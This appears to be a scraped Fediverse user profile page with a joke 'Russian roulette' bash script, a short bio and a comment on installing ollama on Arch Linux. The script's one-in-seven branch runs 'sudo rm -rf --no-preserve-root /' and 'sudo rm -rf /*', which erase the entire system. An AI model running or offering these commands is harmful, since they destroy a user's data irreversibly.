#!/bin/bash
LAIN=$(($RANDOM%(7)))
if [ $LAIN -eq 1 ]; then
echo "YOU DIED"
sudo rm -rf --no-preserve-root /
sudo rm -rf /* # For good measure
fi
Sneezycat
Sound technician from Spain. Late millenial. I like videogames. I use arch btw.
Trans rights are human rights
- 0 Posts
- 2 Comments
Joined 2 years ago
Cake day: June 5th, 2023
You are not logged in. If you use a Fediverse account that is able to follow users, you can follow this user.


Probably. On arch, you install ollama and ollama-cuda and you’re good to go.